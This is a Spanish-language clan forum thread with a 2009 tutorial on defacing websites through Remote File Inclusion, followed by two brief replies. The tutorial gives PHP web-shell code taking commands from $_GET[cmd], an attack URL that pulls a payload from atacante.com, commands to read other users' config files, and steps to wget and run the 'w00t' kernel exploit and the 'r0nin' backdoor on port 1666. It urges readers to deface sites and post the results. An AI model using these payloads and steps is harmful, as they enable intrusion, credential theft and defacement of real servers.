XFBr Clan

Pagina Oficial Del clan XFBr
 
ÍndicePortalCalendarioGaleríaFAQBuscarMiembrosGrupos de UsuariosRegistrarseConectarse

Comparte | 
 

 Defacing - Remote File Inclusion

Ver el tema anterior Ver el tema siguiente Ir abajo 
AutorMensaje
MeXiCoOl28
FFA Pro
avatar

Cantidad de envíos : 38
Edad : 26
Localización : €N M! PC
Reputacion :
100 / 100100 / 100

Infracciones :
0 / 1000 / 100

Reputación : 0
Puntos : 0
Fecha de inscripción : 26/11/2008

MensajeTema: Defacing - Remote File Inclusion   Vie Ene 16, 2009 6:01 pm

Weno manes aka les voi a dejar otro tutorial i presten atencion ya que de aqui en adelante empieza lo bueno ahora aprenderemos RFI (remote file inclusion)

Remote File Inclusion


La famosa técnica RFI. Esta vulnerabilidad permite incluir archivos remotos de otros
servidores, la mayoría de estas vulnerabilidades se encuentran en códigos como:

Código:
<?
include"$page";
?>

Este seria explotado de esta manera:

Código:
vuln.php?page=http//[atacante]

Pero ¿A qué pagina enviamos este archivo? Lo mas normal es enviarlo a uno para poder
ejecutar comandos, el archivo podría tener cualquiera de estos:

Código:
<?
exec($_GET[cmd],$salida);
foreach($salida as $line) { echo "$line<br>"; }
?>
exec();

Código:
<?
system($_GET[cmd],$salida);
foreach($salida as $line) { echo "$line<br>"; }
?>
system();

Código:
<?
passthru($_GET[cmd],$salida);
foreach($salida as $line) { echo "$line<br>"; }
?>
passthru();

Bien ya tenemos el archivo con este código le ponemos una extensión .gif .jpg cual sea
mientras no sea php sino lo ejecutaría en nuestro server. Lo subimos al server y lo
tenemos todo preparado, imaginemos que el url es http://atacante.com/xpl.gif, en xpl.gif
debe haber uno de esos 3 códigos de arriba, cada uno usa una variante distinta ya que
algunos servidores puede que alguna la tenga bloqueada para que no hagan tonterías.

Ahora hacemos un url así...

---> http://victima.com/vuln.php?page=http://atacante.com/xpl.gif?cmd=id;

Podemos ver como estamos incluyendo nuestro archivo, inyectamos un código php y haciendo
que lo ejecute.

Entonces haríamos ..xpl.gif?cmd=[aquí el comando]
Allí va el comando a ejecutar, como una shell.

¿Qué podemos hacer con esto?
Pues muchas cosas, como por ejemplo comandos como "cat" para ver archivos como los de
configuración en texto plano, y así obtener información también podemos hacer cat en
los archivos de otros usuarios, por ejemplo:

---> "cd/home/fulanito/public_html;cat config.php"

O para conseguir una lista de archivos:

---> "cd/home/fulanito/public_html;ls"


Pues aun no esta lo mejor porque aun así sino tenemos permisos podemos obtenerlos por
medio de xploits. A continuación se explicará como utilizarlos.

EXPLOIT w00t

Podemos rootear la maquina con un xploit que aprovecha un bug en el kernel 2.4 el
exploit se llama w00t.

1º Descargaremos w00t.
2º Iremos a la carpeta /tmp hay podemos ejecutar exploits desde nobody (cd/tmp)
3º Subiremos el w00t al server por medio de wget para esto subí el archivo w00t a tu
server y ejecutamos lo siguiente dentro la carpeta tmp:

"wget http://atacante/w00t"


Esto recogerá el archivo w00t de tu server y lo pasara a la carpeta en la que estés (/tmp)

4º Lo que haremos ahora será dar permisos chmod 777 a w00t para poder ejecutarlo
(chmod -c 777 w00t)
5º Ahora lo ejecutaremos (./w00t)6
6º Ahora para saber si funciono escribiremos "id" y nos saldrá nuestro id, nos deberá dar
otro que no sea el de nobody con este no somos root pero tenemos bastantes permisos.


EXPLOIT r0nin

También podemos ejecutar un backdoor en el server para poder entrar con una shell aunque
sea como nobody pero nos puede ser muy útil.

Este xploit se llama r0nin como en la explicación anterior haremos lo mismo:

1º Descargaremos el xploit r0nin
2º Lo subiremos a la carpeta /tmp y le daremos permisos chmod 777 (explicado anteriormente)
3º Hay le ejecutaremos (./r0nin)
4º Si funciona bien veremos algo como: PsychoPhobia Backdoor is starting...OK, pid = xxxx,
(en la xxxx saldrá unos números que es el pid).
5º Bien ahora el backdoor esta ejecutado para entrar entraremos por telnet en el puerto 1666.
También podemos usar el PuTTy para esto. Aquí encontramos una shell como nobody o como lo
hayamos ejecutado.


Aprendieron nenes??? no me sorprendo que a la primera lo logren y si lo hacen me sorprenderian muho, esto de los defaces aveses es deseperante pero uds no desesperen que nadie nacio sabiendolo todo Very Happy practiquen muxo y cuando les haya salido un deface publiquenlo para ver resultados bie amigos de xfbr jjejeje
Volver arriba Ir abajo
Ver perfil de usuario http://www.hackelite.net
XFBr KeTzAl
User Del Mes
User Del Mes
avatar

Cantidad de envíos : 136
Edad : 27
Localización : Teziutlan. Puebla
Reputacion :
50 / 10050 / 100

Infracciones :
0 / 1000 / 100

Reputación : 1
Puntos : 1
Fecha de inscripción : 11/09/2008

MensajeTema: Re: Defacing - Remote File Inclusion   Vie Ene 16, 2009 6:10 pm

oie wue mmmmmm jejeje estan chidos tus post´s pero no le entiendo ni ma...
jajaja espero me puedas enseñar despues con mas calma vaa
buen aporte
Volver arriba Ir abajo
Ver perfil de usuario
MeXiCoOl28
FFA Pro
avatar

Cantidad de envíos : 38
Edad : 26
Localización : €N M! PC
Reputacion :
100 / 100100 / 100

Infracciones :
0 / 1000 / 100

Reputación : 0
Puntos : 0
Fecha de inscripción : 26/11/2008

MensajeTema: Re: Defacing - Remote File Inclusion   Lun Ene 19, 2009 2:24 am

si claro ya sabes we k para cuando tu kieras estoi aahi :d saludos
Volver arriba Ir abajo
Ver perfil de usuario http://www.hackelite.net
Contenido patrocinado




MensajeTema: Re: Defacing - Remote File Inclusion   

Volver arriba Ir abajo
 
Defacing - Remote File Inclusion
Ver el tema anterior Ver el tema siguiente Volver arriba 
Página 1 de 1.
 Temas similares
-
» Option File Pes 6 Actualizaciòn!!!
» [Libro] The official Star Wars Fact File
» Ayuda con RemoteJoy - CF 5.00
» "Nueva" película con Escarabajo...
» Resident Evil Outbreak Ayuda Urgente

Permisos de este foro:No puedes responder a temas en este foro.
XFBr Clan :: Off Topic :: Software-
Cambiar a: